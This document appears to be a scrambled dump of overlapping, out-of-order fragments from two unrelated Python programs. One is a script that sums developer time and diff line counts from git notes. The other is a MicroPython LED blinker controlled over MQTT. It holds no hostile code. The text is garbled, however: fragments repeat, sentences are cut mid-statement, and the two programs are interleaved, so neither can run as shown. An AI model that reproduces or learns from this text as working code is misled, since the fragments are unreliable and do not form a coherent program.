"#!/usr/bin/env python2 from test_json import test_json from cleansing import parse_sublogs, build_graph import os.path", "if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log)", "\"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log", "if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() ==", "pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in log_list: report", "continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring'", "binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff',", "or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\": continue if", "report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] =", "Repo import re import pprint import git import matplotlib import binascii parser =", "subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in", "pprint import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo", "--ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = []", "refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for", "git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\"))", "subprocess import sys import json import argparse from git import Repo import re", "print \"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1)", "0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent']", "0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent'])", "commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0", "== \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1 total_time_per_commit =", "from cleansing import parse_sublogs, build_graph import os.path import subprocess import sys import json", "import sys import json import argparse from git import Repo import re import", "from git import Repo import re import pprint import git import matplotlib import", "productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find", "1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if", "= report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX']", "PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log in logs:", "= subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line", "print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc =", "[] for log in log_list: report = log[1]['log'] if not 'user_responses' in report:", "(line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\": continue", "os.path import subprocess import sys import json import argparse from git import Repo", "matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity", "Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show #", "total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\",", "commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or", "= list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes", "cleansing import parse_sublogs, build_graph import os.path import subprocess import sys import json import", "import Repo import re import pprint import git import matplotlib import binascii parser", "log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import", "repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity", "log_list: report = log[1]['log'] if not 'user_responses' in report: continue if len(report) ==", "git import Repo import re import pprint import git import matplotlib import binascii", "== 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories:", "--ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha,", "\"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\"", "sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit", "+ time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0]))", "if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue", "\".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not", "[] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\",", "pass log_list = [] for hexsha, log in logs: try: for sublog in", "the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot", "= Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show", "try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass", "'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\")", "line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue", "report: continue if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) ==", "lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha,", "try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp =", "subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list =", "test_json import test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess import", "category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent']", "%s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo =", "time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff =", "import test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess import sys", "sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes", "total_time_per_commit = [] for log in log_list: report = log[1]['log'] if not 'user_responses'", "import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the", "from test_json import test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess", "<gh_stars>1-10 #!/usr/bin/env python2 from test_json import test_json from cleansing import parse_sublogs, build_graph import", "\".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha,", "\"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1 total_time_per_commit = sloc", "#pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in log_list: report =", "time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0}", "logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s", "break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] +", "+ time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff", "= [] for hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha,", "git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"),", "not 'user_responses' in report: continue if len(report) == 0: continue user_responses = report['user_responses']", "continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx", "= parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git", "time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in", "import json import argparse from git import Repo import re import pprint import", "u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] +", "total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit", "time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] +", "for log in log_list: report = log[1]['log'] if not 'user_responses' in report: continue", "sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue", "import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs", "category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0,", "time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed", "= list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show", "directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir)", "sys import json import argparse from git import Repo import re import pprint", "eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir,", "0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip()", "in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or", "logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp", "== \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc", "= log[1]['log'] if not 'user_responses' in report: continue if len(report) == 0: continue", "import pprint import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The", "logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"),", "argparse from git import Repo import re import pprint import git import matplotlib", "help=\"The repo that contains the productivity logs as notes\") args = parser.parse_args() if(not", "0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc", "= 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha])", "import argparse from git import Repo import re import pprint import git import", "[] total_time_per_commit = [] for log in log_list: report = log[1]['log'] if not", "if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category", "find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo", "\"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log in logs: try:", "= 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if", "= report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring']", "if not 'user_responses' in report: continue if len(report) == 0: continue user_responses =", "\"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc +=", "show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\",", "report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break", "line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1 total_time_per_commit", "re import pprint import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\",", "in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])])", "time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff", "os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for", "that contains the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))):", "report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for", "import subprocess import sys import json import argparse from git import Repo import", "import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that", "for hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except:", "for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4)", "== 0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories =", "for category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent':", "= (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit =", "diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip()", "continue if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) == 1:", "'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time", "pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in", "args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a", "time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0", "json import argparse from git import Repo import re import pprint import git", "git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains", "parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit =", "binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as", "log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = []", "refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\",", "lines_per_commit = [] total_time_per_commit = [] for log in log_list: report = log[1]['log']", "= argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\") args", "report = log[1]['log'] if not 'user_responses' in report: continue if len(report) == 0:", "= {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent']", "os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes)", "\"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'):", "= [] for log in log_list: report = log[1]['log'] if not 'user_responses' in", "except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit =", "import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for", "log[1]['log'] if not 'user_responses' in report: continue if len(report) == 0: continue user_responses", "for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE,", "#commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git", "line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\"", "PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref", "line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++')", "sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list)", "\".git\"))): print \"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\")", "repo that contains the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir,", "commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except:", "= [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\",", "log in log_list: report = log[1]['log'] if not 'user_responses' in report: continue if", "len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories", "continue if line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or", "if line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'):", "in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint", "commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\",", "in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit", "parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\") args = parser.parse_args()", "(time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo,", "import os.path import subprocess import sys import json import argparse from git import", "= [] total_time_per_commit = [] for log in log_list: report = log[1]['log'] if", "#git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs", "0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories']", "commit.hexsha])]) except: pass log_list = [] for hexsha, log in logs: try: for", "logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list", "list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref", "log_list = [] for hexsha, log in logs: try: for sublog in parse_sublogs(log):", "#nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break else:", "user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx =", "build_graph import os.path import subprocess import sys import json import argparse from git", "\"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log in", "notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not", "list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2", "except: pass log_list = [] for hexsha, log in logs: try: for sublog", "notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs =", "os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if", "test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess import sys import", "notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try:", "in report: continue if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses)", "\".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git", "% os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits =", "repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits", "# git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in" ]
[ "log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board import", "the module launcher loop in main.py; it is passed a handle onto the", "onto the MQTT # dispatcher and to the \"blinky\" config dict in board_config.py", "to %s\", self.topic) # start is called by the module launcher loop in", "mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start", "str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup)", "await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period", "act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs):", "MQTT # dispatcher and to the \"blinky\" config dict in board_config.py def start(mqtt,", "ValueError(\"period must be in 50..10000\") self.period = p except Exception as e: log.exc(e,", "\"blinky\" config dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) #", "> 10000: raise ValueError(\"period must be in 50..10000\") self.period = p except Exception", "%s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic ==", "def start(mqtt, config): period = config.get(\"period\", 1000) # get period from config with", "def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s", "start(mqtt, config): period = config.get(\"period\", 1000) # get period from config with a", "# get period from config with a default of 1000ms log.info(\"start called, period=%d\",", "topic, len(msg), retained, qos, dup) if topic == self.topic: try: p = int(msg)", "a default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"], period)", "// 2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained,", "is passed a handle onto the MQTT # dispatcher and to the \"blinky\"", "handle onto the MQTT # dispatcher and to the \"blinky\" config dict in", "import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic", "millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup): topic =", "# start is called by the module launcher loop in main.py; it is", "topic self.period = period async def blinker(self): while True: act_led(1) await sleep_ms(self.period //", "p except Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt):", "def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic)", "self.mqclient = mqclient self.topic = topic self.period = period async def blinker(self): while", "is called by the module launcher loop in main.py; it is passed a", "get period from config with a default of 1000ms log.info(\"start called, period=%d\", period)", "= str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos,", "act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic =", "if topic == self.topic: try: p = int(msg) if p < 50 or", "uasyncio import Loop as loop, sleep_ms from board import act_led class Blinker: def", "import Loop as loop, sleep_ms from board import act_led class Blinker: def __init__(self,", "// 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs", "2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos,", "millisecs def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg:", "hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) #", "int(msg) if p < 50 or p > 10000: raise ValueError(\"period must be", "main.py; it is passed a handle onto the MQTT # dispatcher and to", "in main.py; it is passed a handle onto the MQTT # dispatcher and", "def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup):", "logging log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board", "self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic,", "# dispatcher and to the \"blinky\" config dict in board_config.py def start(mqtt, config):", "qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic: try: p", "try: p = int(msg) if p < 50 or p > 10000: raise", "dup) if topic == self.topic: try: p = int(msg) if p < 50", "(len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic:", "def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period //", "topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained,", "on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d", "= topic self.period = period async def blinker(self): while True: act_led(1) await sleep_ms(self.period", "if p < 50 or p > 10000: raise ValueError(\"period must be in", "in 50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid incoming message\")", "module launcher loop in main.py; it is passed a handle onto the MQTT", "be in 50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid incoming", "while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def", "e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") 